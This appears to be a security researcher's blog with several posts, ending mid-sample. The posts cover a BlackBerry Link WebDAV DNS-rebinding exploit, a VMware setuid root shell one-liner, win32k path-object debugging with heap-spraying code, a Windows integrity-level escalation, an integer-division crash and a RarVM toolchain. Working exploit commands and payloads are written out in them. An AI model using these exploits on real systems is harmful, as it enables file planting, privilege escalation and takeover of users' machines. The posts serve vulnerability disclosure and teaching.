Tuesday, November 12, 2013

QNX

I remember being blown away by the QNX 1.44M demo as a teenager, it had a really big impact on me. At one time, I had even configured fvwm to look like QNX Photon. Here is a real screenshot of my desktop from May 2004 (an old configuration file of mine is still on the fvwm site):




Curious about what RIM have been doing with QNX since the acquisition, I bought a BlackBerry Q10.


If you connect a pristine BlackBerry 10 device to a computer, it will identify itself as a SCSI CD-ROM, and attempt to autoplay the installation of BlackBerry Link.


$ lsusb -d 0x0FCA:
Bus 002 Device 006: ID 0fca:8020 Research In Motion, Ltd.
$ cdrecord --devices
-------------------------------------------------------------------------
0  dev='/dev/sg1' rwrw-- : 'RIM' 'PlayBook CD'
-------------------------------------------------------------------------
$ isoinfo -l -i /dev/sr0

Directory listing of /
d---------   0    0    0            2048 Dec 19 2012 [     21 02]  .
d---------   0    0    0            2048 Dec 19 2012 [     21 02]  ..
----------   0    0    0              72 Dec 19 2012 [     28 00]  AUTORUN.INF
d---------   0    0    0            2048 Dec 19 2012 [     22 02]  BACKGROUND
----------   0    0    0           38198 Dec 19 2012 [     29 00]  BLACKBERRY LINK INSTALLATI.RTF
d---------   0    0    0            2048 Dec 19 2012 [     23 02]  DRIVERS
----------   0    0    0           95326 Dec 19 2012 [  19546 00]  README.RTF
----------   0    0    0        58251649 Dec 19 2012 [  19593 00]  START.DMG
----------   0    0    0          432808 Dec 19 2012 [     48 00]  START.EXE

Directory listing of /BACKGROUND/
d---------   0    0    0            2048 Dec 19 2012 [     22 02]  .
d---------   0    0    0            2048 Dec 19 2012 [     21 02]  ..
----------   0    0    0            5655 Dec 19 2012 [  48037 00]  BACKGROUND.PNG

Directory listing of /DRIVERS/
d---------   0    0    0            2048 Dec 19 2012 [     23 02]  .
d---------   0    0    0            2048 Dec 19 2012 [     21 02]  ..
----------   0    0    0        36311440 Dec 19 2012 [    260 00]  BLACKBERRYDEVICEMANAGER.EXE
----------   0    0    0         2038440 Dec 19 2012 [  17991 00]  BLACKBERRYLAUNCHER.EXE
----------   0    0    0           83032 Dec 19 2012 [  18987 00]  SETUP.EXE
----------   0    0    0              10 Dec 19 2012 [  19028 00]  VERSION.TXT
$ isoinfo -x /AUTORUN.INF -i /dev/sr0
[AutoRun]
shellexecute=start.exe
icon=start.exe
label=BlackBerry CD


BlackBerry Link is the synchronization and management software for BlackBerry 10, and I couldn't help notice it immediately spawns an nginx process after installation.




Locating the nginx configuration, I found it’s being used as a WebDAV server, listening on an IPv6 address I don't recognise. It appears to be serving my %APPDATA% directory with no access control or authentication.


$ cat nginx.conf
...
       server {
               listen [fd0e:454e:f025:58dd:30e9:d752:1223:9cbf]:8080 default_server;
               server_name rimdav;
               location  / {
                       folder_config;
               }


...
               dav_access all:rw;


$ netstat -p TCPv6 -a
Active Connections


 Proto  Local Address          Foreign Address        State
 TCP    [::]:135               WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::]:445               WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::]:1025              WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::]:1026              WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::]:1027              WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::]:1029              WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::]:1032              WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::]:1047              WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::1]:1040             WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::1]:1040             WIN-DBVU5A9QFHT:1049   ESTABLISHED
 TCP    [::1]:1049             WIN-DBVU5A9QFHT:1040   ESTABLISHED
 TCP    [fd0e:454e:f025:58dd:30e9:d752:1223:9cbf]:8080  WIN-DBVU5A9QFHT:0      LISTENING
$ curl -g -X PUT --data "calc.exe" "http://[fd0e:454e:f025:58dd:30e9:d752:1223:9cbf]:8080/Start%20Menu/Programs/Startup/exploit.bat"


This looks wrong for multiple reasons. Apart from breaking the NT security model, the address is published in multicast DNS, so everyone on the network can see it.


The exploit is simple, you use DNS rebinding to get permission to XMLHttpRequest to the WebDAV share, then you can read or write anywhere relative to a victims %APPDATA% directory.


I wrote a quick IPv6 rebinding nameserver to test it. The idea is to just extract two AAAA records from the query labels, then return one at random with a very short (1 second) TTL. The attack will work on IPv4 networks as well, where you switch between returning 1 answer and 0 answers for A queries, but I haven't implemented A record support.


It works like this:


$ host aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us
aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us has IPv6 address aabb:ccdd:eeff:aabb:ccdd:eeff:aabb:ccdd
$ host aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us
aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us has IPv6 address aabb:ccdd:eeff:aabb:ccdd:eeff:aabb:ccdd
$ host aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us
aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us has IPv6 address 1122:3344:5566:7788:99aa:1122:3344:5566
$ host aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us
aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us has IPv6 address aabb:ccdd:eeff:aabb:ccdd:eeff:aabb:ccdd
$ host aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us
aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us has IPv6 address 1122:3344:5566:7788:99aa:1122:3344:5566


As you can see, it returns a random address specified in the query labels, switching between a host you control and a host you don’t.


So lets search for a victim on my network, you can use dig to query the multicast address 224.0.0.251 on port 5353 or avahi-browse if you have it:


$ avahi-browse -r -t _bp2p._tcp
+   eth0 IPv4 webdav_B309F0A0D86BA5EF_7846FB91C6A398A5      _bp2p._tcp           local
+   eth0 IPv4 Friendly_DA52877F19217E9B_7A0D69D13ECAE391    _bp2p._tcp           local
=   eth0 IPv4 webdav_B309F0A0D86BA5EF_7846FB91C6A398A5      _bp2p._tcp           local
  hostname = [3c222e49b3165fda656214723f757f.local]
  address = [fd3c:222e:49b3:165f:da65:6214:723f:757f]
  port = [8080]
  txt = []


Then I start an http server on my machine on a matching port:


$ python
Python 2.7.3 (default, Sep 26 2013, 20:03:06)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import socket
>>> from BaseHTTPServer import HTTPServer
>>> from SimpleHTTPServer import SimpleHTTPRequestHandler
>>>
>>> class HTTPServerV6(HTTPServer):
...  address_family = socket.AF_INET6
...
>>> HTTPServerV6(('::', 8080), SimpleHTTPRequestHandler).serve_forever()


I send the victim a link to a page that reloads http://aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us:8080 in an iframe until I get the server I control, and then return something like this:


<html>
<head></head>
<body>
<h1>Please Wait...</h1>

<script>
   // Where you want to write to on victim, relative to %APPDATA%.
   var path   = "/Start%20Menu/Programs/Startup/exploit.bat";

   // What you want to write there.
   var data   = "calc.exe";

   function sendRequest()
   {
       var xhr = new XMLHttpRequest();
       xhr.open("PUT", document.location.origin + path, false);
       xhr.send(data);
   }

   setInterval(sendRequest, 1000);
</script>
</body>
</html>


After a few seconds, the address should rebind and the browser will PUT the batch file into their Startup directory, I verified this works with the latest BlackBerry Link on Windows 7.


This vulnerability is CVE-2013-3694, which RIM are scheduled to resolve today.

Thursday, August 22, 2013

Security Debianisms

On most modern Linux systems, /bin/sh is provided by bash, which detects that it's being invoked as sh, and attempts to mimic traditional sh. As everyone who works in security quickly learns, bash will drop privileges very early if uid != euid.

 488
 489   if (running_setuid && privileged_mode == 0)
 490     disable_priv_mode ();
 491

Where disable_priv_mode is defined as:

1202 void
1203 disable_priv_mode ()
1204 {
1205   setuid (current_user.uid);
1206   setgid (current_user.gid);
1207   current_user.euid = current_user.uid;
1208   current_user.egid = current_user.gid;
1209 }

Non-Linux systems tend to use pdksh as /bin/sh, which also supports privmode since version 5.0.5:

 307     /* Turning off -p? */
 308     if (f == FPRIVILEGED && oldval && !newval) {
 309 #ifdef OS2
 310         ;
 311 #else /* OS2 */
 312         setuid(ksheuid = getuid());
 313         setgid(getgid());
 314 #endif /* OS2 */
 315     } else if (f == FPOSIX && newval) {


This is surprisingly effective at mitigating some common vulnerability classes and misconfigurations. Indeed, Chet Ramey (bash author and maintainer) explains that the purpose of this is to prevent "bogus system(3) calls in setuid executables", see section 7 of the bash NOTES file.

However, this never really happens on Debian derived systems. Debian (and therefore Ubuntu) will use dash by default (see https://wiki.debian.org/DashAsBinSh), or disable it with this patch if you choose to use bash:

http://patch-tracker.debian.org/patch/series/view/bash/4.2+dfsg-0.1/privmode.diff

A nice example of this failing can be observed in the VMware utilities, which try to invoke lsb_release with popen() to learn about the current execution environment. This means you can get a nice easy root shell like this on any Debian/Ubuntu derived system with VMware installed:

$ cc -xc - -olsb_release<<<'main(){system("sh>`tty` 2>&1");}';PATH=.:$PATH vmware-mount
# whoami
root

It looks like Debian originally decided they didn't want privmode because it broke UUCP (!?).

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586

VMware do list Debian/Ubuntu as supported host platforms though, so they have published a fix for this issue today. If you care about this and can't wait for the patch, you can temporarily remove the setuid bit from vmware-mount like this:

# chmod u-s /usr/bin/vmware-mount

Note that it is almost impossible to use popen() or system() safely in a setuid program without privmode, even if you specify the full path. This is a fun example from back in 2005, but there are lots more cases.

In conclusion, too bad if an otherwise unexploitable bug becomes exploitable, that's the price you pay for high quality uucp support in 2013 ;-)

P.S. If you don't know what uucp is, you can read more about it on fidonet or at my gopher site.
P.P.S. I sent the dash maintainers a patch today, but I'm not sure if they're interested.

Wednesday, May 15, 2013

Introduction to Windows Kernel Security Research


A few months ago, I mentioned a crash I'd encountered under memory pressure on windows. I was hoping sharing a reproducer might stimulate someone who was interested in learning about kernel debugging to investigate, learning some new skills and possibly getting some insight into researching security issues, potentially getting a head start on discovering their own.

Sadly, I've yet to hear back from anyone who had done any work on it. I think the path subsystem is obscure enough that  it felt too daunting a task for someone new to jump into, and the fact that the reproducer is not reliable might have been scary. I've decided to help get you started, hopefully someone will feel inspired enough to continue. Before reading this post, I assume you're comfortable with kd, IDA Pro and debugging without source code.

First some background, hopefully you're already familiar with GDI basics and understand Pens, Brushes and so on. Paths are basically shapes that can be created by moving between points, they can be straight lines, or irregular and composed of curves, arcs, etc. Internally, a path is stored as a linked list of it's components (points, curves, etc).

http://msdn.microsoft.com/en-us/library/windows/desktop/dd162779(v=vs.85).aspx

The path subsystem is very old (pre-NT?), and uses it's own object allocator called PATHALLOC. PATHALLOC is relatively simple, it's backed (indirectly) by HeavyAllocPool() with the tag 'tapG', but does include it's own simple freelist implementation to reduce calls to HeavyAllocPool.

The PATHALLOC entrypoints are newpathalloc() and freepathalloc(), if you look at the code you'll see it's very simple and easy to understand. Notice that if an allocation cannot be satisfied from the freelist, newpathalloc will always memset zero allocations via PALLOCMEM(), similar to what you might expect from calloc.

However, take a look at the freelist check, if the allocation is satisfied from the freelist, it skips the memset zero. Therefore, it might return allocations that have not been initialized, and callers must be sure to do this themselves.

It turns out, getting an object from the freelist happens quite rarely, so the few cases that don't initialize their path object have survived over 20 years in NT. The case we're going to take a look at is EPATHOBJ::pprFlattenRec().

Hopefully you're familiar with the concept of flattening, the process of translating a bezier curve into a sequence of lines. The details of how this works are not important, just remember that curves are converted into lines.


Flattening a curve, illustration from GraphicsPath MSDN documentation.


EPATHOBJ::pprFlattenRec() is an internal routine for applying this process to a linked list of PATHRECORD objects. If you follow the logic, you can see that the PATHRECORD object retrieved from newpathrec() is mostly initialized, but with one obvious error:

EPATHOBJ::pprFlattenRec(_PATHRECORD *)+33:
.text:BFA122CD                 mov     eax, [esi+PATHRECORD.prev]       ; load old prev
.text:BFA122D0                 push    edi
.text:BFA122D1                 mov     edi, [ebp+new]                   ; get the new PATHRECORD
.text:BFA122D4                 mov     [edi+PATHRECORD.prev], eax       ; copy prev pointer over
.text:BFA122D7                 lea     eax, [edi+PATHRECORD.count]      ; save address of count member
.text:BFA122DA                 xor     edx, edx                         ; set count to zero
.text:BFA122DC                 mov     [eax], edx
.text:BFA122DE                 mov     ecx, [esi+PATHRECORD.flags]      ; load flags
.text:BFA122E1                 and     ecx, 0FFFFFFEFh                  ; clear bezier flag (bezier means divide points by 3 because you need two control points and an ending point).
.text:BFA122E4                 mov     [edi+PATHRECORD.flags], ecx      ; copy old flags over

The next pointer is never initialized! Most of the time you want a new list node to have the next pointer set to NULL, so this works if you don't get your object from the freelist, but otherwise it won't work!

How can we verify this hypothesis? Let's patch newpathrec() to always set the next pointer to a recognisable
value, and see if we can reproduce the crash (Note: I don't use conditional breakpoints because of the performance overhead, if you're using something fancy like virtualkd, it's probably better to use them).

There's a useless assertion in the checked build I don't need, I'll just overwrite the code with mov [pathrec->next], dword 0x41414141, like this (you can use the built in assembler if you want, but I don't like the syntax):

kd> ba e 1 win32k!EPATHOBJ::newpathrec+31
kd> g
Breakpoint 0 hit
win32k!EPATHOBJ::newpathrec+0x31:
96611e9a 83f8ff          cmp     eax,0FFFFFFFFh
kd> eb @eip c7 41 F0 41 41 41 41 90 90 90 90 90 90 90 90 90 90
kd> bc *
kd> g
Access violation - code c0000005 (!!! second chance !!!)
win32k!EPATHOBJ::bFlatten+0x15:
9661252c f6400810        test    byte ptr [eax+8],10h
kd> r
eax=41414141 ebx=9659017e ecx=a173bbec edx=00000001 esi=a173bbec edi=03010034
eip=9661252c esp=a173bbe4 ebp=a173bc28 iopl=0         nv up ei pl nz na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010206
win32k!EPATHOBJ::bFlatten+0x15:
9661252c f6400810        test    byte ptr [eax+8],10h       ds:0023:41414149=??

This looks like convincing evidence that a newpathrec() caller is not initialising new objects correctly. When bFlatten() tried to traverse the linked list of PATHREC objects, it doesn't find the NULL it was expecting.

We know the PATHREC list starts at EPATHOBJ+8, the pointer to the first element is in PATHREC+14, and the next pointer is at +0, so we can look at the chain of PATHREC objects that caused bFlatten() to crash in kd.

  1. The EPATHOBJ is in ecx (Because of the thiscall calling convention).
  2. The PATHREC list starts at poi(ecx+8)
  3. The first element in the list is at poi(poi(ecx+8)+14) (i.e. the head pointer)
  4. The next pointer for the first record will be at +0 in the PATHREC poi(poi(poi(ecx+8)+14))
We can keep adding poi() calls until we find the bad next pointer:

  • this
    • ecx
  • this->pathlist
    • poi(ecx+8)
  • this->pathlist->head
    • poi(poi(ecx+8)+14)
  • this->pathlist->head->next
    • poi(poi(poi(ecx+8)+14))
  • this->pathlist->head->next->next
    • poi(poi(poi(poi(ecx+8)+14)))
  • this->pathlist->head->next->next->next
    • poi(poi(poi(poi(poi(ecx+8)+14))))
  • etc.

Here is the object with the bad next pointer for me:

kd> dd poi(poi(poi(ecx+8)+14))
fe9395a4  ff1fdde5 fe93904c 00000000 00000149
fe9395b4  01a6d0bf 00ec8b39 01a68f40 00ec19f2
fe9395c4  01a64da5 00eba8c0 01a60bee 00eb37a5
fe9395d4  01a5ca1b 00eac69f 01a5882d 00ea55af
fe9395e4  01a54623 00e9e4d5 01a503fd 00e97411
fe9395f4  01a4c1bb 00e90362 01a47f5e 00e892ca
fe939604  01a43ce6 00e82247 01a3fa52 00e7b1da
fe939614  01a3b7a2 00e74183 01a374d7 00e6d142

The standard process for researching this kind of problem is to implement the various primitives we can chain together to get the behaviour we want reliably. These are the building blocks we use to control what's happening.

Conceptually, this is something like:

Primitive 1: Allocate a path object with as much contents controlled as possible.
Primitive 2: Get that path object released and added to the freelist.
Primitive 3: Trigger the bad allocation from the freelist.

Once we have implemented these, we can chain them together to move an EPATHOBJ reliably into userspace, and then we can investigate if it's exploitable. Let's work on this.

Controlling the contents of a PATHREC object

A PATHREC looks something like this:

struct PATHREC {
    VOID              *next;
    VOID              *prev;
    ULONG              flags;
    ULONG              count;       // Number of points in array
    POINTFIX           points[0];   // variable length array
};

POINTFIX is documented in msdn as "A point structure that consists of {FIX x, y;}.". Let's try adding a large number of points to a path consisting of recognisable values as x,y coordinates with PolyBezierTo() and see if we can find it.

If we break during the bounds checking in newpathrec(), we should be able to dump out the points and see if we hit it.

I wrote some code like this (pseudocode):

    POINT  *Points = calloc(8192, sizeof(POINT));

    while (TRUE) {
        for (i = 0; i < 8192; i++) {
            Points[i].x = 0xDEAD;
            Points[i].y = 0xBEEF;
        }

        BeginPath(Device);
        PolyBezierTo(Device, Points, 8192 / 3);
        EndPath(Device);
    }

And put a breakpoint in newpathrec(), and after some waiting, I see this:

kd> ba e 1 win32k!EPATHOBJ::newpathrec+23 "dd @ecx; gc"
kd> g
fe85814c  000dead0 000beef0 000dead0 000beef0
fe85815c  000dead0 000beef0 000dead0 000beef0
fe85816c  000dead0 000beef0 000dead0 000beef0
fe85817c  000dead0 000beef0 000dead0 000beef0
fe85818c  000dead0 000beef0 000dead0 000beef0
fe85819c  000dead0 000beef0 000dead0 000beef0
fe8581ac  000dead0 000beef0 000dead0 000beef0
fe8581bc  000dead0 000beef0 000dead0 000beef0

This confirms the theory, that this trick can be used to get our blocks on the freelist. I spent some time making this reliable.

Spamming the freelist with our POINTFIX structures

Lets make sure that our paths are full of curves with these points, and then flatten them to resize them (thus reducing the number of points). If it works, just by chance we should start to see the original testcase crashing at recognisable addresses.

GDISRV:AllocateObject failed alloc of 2268 bytes
GDISRV:AllocateObject failed alloc of 2268 bytes
GDISRV:AllocateObject failed alloc of 2268 bytes
Access violation - code c0000005 (!!! second chance !!!)
9661252c f6400810        test    byte ptr [eax+8],10h
kd> r
eax=04141410 ebx=9659017e ecx=8ef67bec edx=00000001 esi=8ef67bec edi=03010034
eip=9661252c esp=8ef67be4 ebp=8ef67c28 iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202
win32k!EPATHOBJ::bFlatten+0x15:
9661252c f6400810        test    byte ptr [eax+8],10h       ds:0023:04141418=??
kd> kv
ChildEBP RetAddr  Args to Child              
8ef67be4 965901ce 00000001 00000119 fe71cef0 win32k!EPATHOBJ::bFlatten+0x15 (FPO: [0,0,4])
8ef67c28 829e0173 03010034 001cfb48 76f0a364 win32k!NtGdiFlattenPath+0x50 (FPO: [Non-Fpo])
8ef67c28 76f0a364 03010034 001cfb48 76f0a364 nt!KiFastCallEntry+0x163 (FPO: [0,3] TrapFrame @ 8ef67c34)

Success! Now we have at least some control over the address, which is something to work with. You can see in EPATHOBJ::bFlatten() the object is handed over to EPATHOBJ::pprFlattenRec(), which is a good place to start looking to look for exploitation opportunities, possibly turning this into code execution.

You can copy my portable shellcode from my KiTrap0D exploit if you need one, which should work reliably on many different kernels, the source code is available here:

http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip

If nobody jumps in, I'll keep adding more notes. Feel free to ask me questions if you get stuck or need a hand!

If you solve the mystery and determine this is a security issue, send me an email and I'll update this post. If you confirm it is exploitable, feel free to send your work to Microsoft if you feel so compelled, if this is your first time researching a potential vulnerability it might be an interesting experience.

Note that Microsoft treat vulnerability researchers with great hostility, and are often very difficult to work with. I would advise only speaking to them under a pseudonym, using tor and anonymous email to protect yourself.

Sunday, February 3, 2013

The "Other" Integer Overflow

If you've been programming in C or a similar language for any period of time, you've inevitably had to pick up some of the esoteric intricacies of the underlying hardware. Defined behaviour doesn't always protect you, and can sometimes be surprising.

One of my favourite examples is how divide errors work on the Intel architecture, simply because it always surprises developers who've never seen it before. High level languages try to protect the programmer from having to know these edge cases, so the developers who have made the transition to C/C++ from other languages aren't always aware of it.

Here is what the C99 Standard says on the subject of integer division:
5 The result of the / operator is the quotient from the division of the first operand by the
second; the result of the % operator is the remainder. In both operations, if the value of
the second operand is zero, the behavior is undefined.
No surprises there, but the Intel Architecture manuals do make a curious generalisation on the subject of the IDIV instruction:
The action of this instruction depends on the operand size (dividend/divisor).
Non-integral results are truncated (chopped) towards 0. The remainder is always less than the divisor in magnitude. Overflow is indicated with the #DE (divide error) exception rather than with the CF flag.
A careful reader might notice the last sentence, indicating that all overflow conditions result in #DE, not just divide by zero. Later versions of the C standard account for this, with this language.

If the quotient a/b is representable, the expression
(a/b)*b + a%b shall equal a; otherwise, the behavior of both a/b and a%b is
undefined.

If this is news to you, here's what this means. On twos complement systems, the absolute value of INT_MIN is higher than INT_MAX, so dividing INT_MIN by -1 overflows.  It's easy to see why if you look at the bit patterns for these values.

(gdb) p/t (char) -128 / (char) -1
$11 = 10000000
(gdb) p/t (char) -128
$12 = 10000000

It's always fun to try this on software that does integer division on user specified values. Few developers forget to check for division by zero, but you can always find someone who didn't know this, and the system will crash in surprising ways. Here is a neat one I just spotted on Windows:

https://gist.github.com/4658638



// kd> vertarget
// Windows 8 Kernel Version 9200 MP (1 procs) Free x86 compatible 
// Product: WinNt, suite: TerminalServer SingleUserTS 
// Built by: 9200.16384.x86fre.win8_rtm.120725-1247 
// Machine Name: 
// Kernel base = 0x81a5a000 PsLoadedModuleList = 0x81c44de8 
// Debug session time: Mon Jan 28 12:10:37.216 2013 (UTC - 8:00) 
// System Uptime: 0 days 0:06:15.595 
// kd> .trap 9df1baf8 
// ErrCode = 00000000 
// eax=80000000 ebx=8e07fac7 ecx=94eedaf8 edx=ffffffff esi=94eed720 edi=9df1bbd4 
// eip=8e0763cc esp=9df1bb6c ebp=9df1bba4 iopl=0 ov up ei ng nz na pe cy 
// cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010a87 
// win32k!GreScaleWindowExtEx+0x8f: 
// 8e0763cc f77d10 idiv eax,dword ptr [ebp+10h] ss:0010:9df1bbb4=ffffffff 
// kd> kv 
// *** Stack trace for last set context - .thread/.cxr resets it 
// ChildEBP RetAddr Args to Child 
// 9df1bba4 8e07faeb 600107ba 80000000 ffffffff win32k!GreScaleWindowExtEx+0x8f (FPO: [Non-Fpo]) 
// 9df1bbf4 81bc52fc 600107ba 80000000 ffffffff win32k!NtGdiScaleWindowExtEx+0x24 (FPO: [Non-Fpo]) 
// 9df1bbf4 77b96954 600107ba 80000000 ffffffff nt!KiFastCallEntry+0x12c (FPO: [0,3] TrapFrame @ 9df1bc14) 
// 00a8faec 7634515b 76346d4b 600107ba 80000000 ntdll!KiFastSystemCallRet (FPO: [0,0,0]) 
// 00a8faf0 76346d4b 600107ba 80000000 ffffffff GDI32!NtGdiScaleWindowExtEx+0xa (FPO: [6,0,0]) 
// 00a8fb28 00f91036 600107ba 80000000 ffffffff GDI32!ScaleWindowExtEx+0xeb (FPO: [Non-Fpo]) 

HWND_BROADCAST

A few years ago while working on Windows sandboxing, I noticed a few relatively minor problems with Job Objects, Desktops and related facilities. I reported them to Microsoft, who said they don't consider these supported security boundaries and declined to fix them, but this was no big deal and I dropped the issue. The chrome security guys developed techniques to workaround some of these bugs in Chrome instead.

One of the problems I described was how broadcast messages were exempt from UIPI, and gave an example of how a LI process can broadcast WM_CHAR messages which would be interpreted as input to any open MI/HI command prompts.

The attack was not devastating, because an attacker would have to wait for a user to open a command prompt as MI or HI and then take over, which is a pretty weak attack. However, a few weeks ago I noticed a Microsoft blogger claiming that this exact scenario was impossible.

Unable to resist correcting him, I posted a comment on his blog and tweeted about it.

A few weeks later, Microsoft fixed it in MS13-005. This surprised me, because I didn't know a really good attack to abuse it, and Microsoft previously told me they were not interested. I figured Microsoft must have discussed it internally, and had realised a better way to exploit it.

A few days later I realised what the attack was.

LI processes can still trigger Global Hotkeys with keybd_event, so if I enumerate all the hotkeys registered in a default installation, maybe one of these will offer the solution. I put a kd breakpoint on NtUserRegisterHotkey and enumerated them all.

I think I figured it out, here is the attack I think Microsoft realised before I did:

  • From a Low Integrity process, spawn a cmd.exe and wait for explorer to add it to the task list.
  • Use keybd_event to send Win+Shift+[1 ... 9]
  • Explorer will spawn a new cmd.exe, which will inherit Medium Integrity from explorer.
  • Use SendMessage with HWND_BROADCAST to send WM_CHAR messages.
  • Drive the command prompt to send any new command you want, along with some ASCII art skulls to make it look like a scene from a Hollywood movie.
Apparently Packetstorm are offering a reward for a working implementation of this, so be my guest if you want to practice your Win32 scripting skills.

Friday, September 28, 2012

Fun with Constrained Programming

Believe it or not, RAR files can contain bytecode for a simple x86-like virtual machine called the RarVM. This is designed to provide filters (preprocessors) to perform some reversible transformation on input data to increase redundancy, and thus improve compression.

For example, one filter (likely inspired by LZX, an earlier scheme with a similar feature) is called "Intel E8 preprocessing", which is designed to increase redundancy in x86 code.


If you imagine a program like this:



mov   foo, bar 
cmp   bar, baz
push  foo 
call  write
push  bar
call  write


The two calls are relative to the branch location, so there will be two different encodings of the same instruction. At compress time, we can translate them to absolute addresses. This way, the same instruction appears twice, and can therefore be compressed much more efficiently. When the archive is decompressed, this transformation can be reversed to restore the original.


WinRAR includes around a dozen standard filters that improve compression of several common inputs, but surprisingly also allows new filters to be defined at runtime by archives!


As far as I'm aware, no tool exists to explore this functionality. This is just too tempting to play with, so I've written some. So far, I have a RAR toolchain working, as well as some documentation on how to write programs.


You can checkout the code and some example programs on github, https://github.com/taviso/rarvmtools.



$ cat helloworld.rs
#include <constants.rh>
#include <util .rh>

; vim: syntax=fasm
; Test RAR assembly file.
_start:
    ; Install our message in the output buffer
    mov     r3, #0x1000                 ; Output buffer.
    mov     [r3+#0], #0x6c6c6548        ; 'lleH'
    mov     [r3+#4], #0x57202c6f        ; 'W ,o'
    mov     [r3+#8], #0x646c726f        ; 'dlro'
    mov     [r3+#12], #0x00000a21       ; '!\n'
    mov     [VMADDR_NEWBLOCKPOS],  r3   ; Pointer
    mov     [VMADDR_NEWBLOCKSIZE], #14  ; Size
    call    $_success
$ make helloworld.rar
cpp -I../stdlib < helloworld.rs > helloworld.ri
../raras -o helloworld.ro helloworld.ri
../rarld helloworld.ro > helloworld.rar
rm helloworld.ri helloworld.ro
$ unrar p -inul helloworld.rar
Hello, World!


At the moment, the toolchain consists of a minimal linker and assembler. I've been toying with the idea of porting a compiler (possibly an llvm backend, or gcc target), but I'm not sure if I'm that crazy.




Needless to say, programming something as ridiculous as WinRAR presents some interesting challenges, but the fact that it's so widely deployed presents some some fun possibilities. Here is a quick overview of the architecture.


Familiarity with x86 (and preferably Intel assembly syntax) would be an advantage, as the VM was clearly inspired by x86. There are 8 named registers, called r0 to r7.

r7 is used as a stack pointer for stack related operations (such as push, call, pop, etc), and grows down. A RarVM filter may execute for at most 250,000,000 instructions, at which
point it will be terminated. However there are no limits on the number of filters included in a file, so you can simply split your task into multiple 250M cycle chunks. If the instruction pointer ever moves outside the code segment, the program is considered to have completed
successfully.

Filters have a 0x40000 byte address space, and access to 3 status flags : ZF (Zero), CF (Carry) and SF (Sign) which can be accessed via the conditional branch instructions, or via pushf/popf (as on x86).

These are the operand types supported


  • Registers (r0, r1, ..., r7)
  • Memory references ([#0x12345])
  • Register indirect references ([r0])
  • Base + Index indirect references ([r4+#0x1234])
  • Immediate (#0x12312)


As a convenience, the assembler also supports symbolic references that are resolved to immediates at compile time, just prefix them with a $.

  • Symbolic references (jnz $next_loop)

There are no restrictions on how many memory references you can make (like on Intel), so this is perfectly legal:

mov [r0+#0x1234], [r7-#12]

RAR programs can either supply their own initial register values, or use the default set which includes some status information. If you don't specify your own registers, these will be set:
  • r3: Address of Global Memory Buffer
  • r4: Filter Block Length
  • r5: Filter Execution Count
  • r7: Top of address space (and thus the stack grows down).

Dynamic Output

So here's the fun part, because RAR is intended to be an archiver and not a programming environment, the Windows version of WinRAR requires the output from your program matches the CRC stored in the volume header....Ouch.





That would normally mean that you can't write a program whose output you cannot predict at compile time, making things a little less interesting. However, there's no need to give up so easily.

Julien wrote a paper on dynamic CRC compensation algorithms (french, but the code is understandable). I've ported his algorithm to RarVM, so I now have a self-hosted RAR file that can produce dynamic output and compensate it's own output at runtime to match a fixed CRC. 

Yes, that's pretty ridiculous.

Here is a portion of the CRC compensation code:


; Modifies a few bytes within the first 7 bytes of buffer to force the CRC32 to
; match the requested value. You should reserve the first few bytes of buffer
; for this process.
;
; Original implementation based on a paper by Julien Tinnes.
_compensate_crc:
        ; [r6+#16]  target     // Desired CRC value.
        ; [r6+#12]  length     // Size of buffer.
        ; [r6+#8]   buffer     // Pointer to buffer to compensate.
        ; [r6+#4]   r
        ; [r6+#0]   s
        ; [r6-#4]   modlen     // Length % 4
        push    r6                          ; save frame pointer
        mov     r6, r7                      ; create new frame
        sub     r7, #4                      ; allocate variables
        push    [r6+#12]                    ; length
        push    [r6+#8]                     ; buffer
        call    $_crc_block                 ; _crc_block(buffer, length)
        xor     [r6+#16], r0                ; target ^= currentcrc
        push    #4                          ; divisor
        push    [r6+#12]                    ; length
        call    $_mod                       ; _mod(length, 4)
        mov     [r6-#4], r0                 ; save this calculation
        sub     [r6+#12], [r6-#4]           ; length -= modlen
        div     [r6+#12], #4                ; divide by 4
        sub     [r6+#12], #1                ; calculate row for _find_vector_x
        push    [r6+#12]                    ; row
        push    [r6+#16]                    ; target
        call    $_find_vector_x             ; _find_vector_x(target, row)
        push    r0                          ; value
        call    $_bswap                     ; byte swap result
        add     [r6+#8], [r6-#4]            ; calculate offset to modify
        mov     r1, [r6+#8]                 ; load address
        xor     [r1], r0                    ; compensate crc
        xor     r0, r0                      ; return code
        mov     r7, r6                      ; clear frame
        pop     r6
        ret


And the result:


$ cat sample.rs 
#include
#include
#include
#include
; vim: syntax=fasm

; Test RAR assembly file that just demonstrates the syntax.

_start:
    ; Install our message in the output buffer
    mov     r3,       #0x1000            ; Output buffer.
    mov     [r3+#0],  #0x41414141        ; Padding for compensation
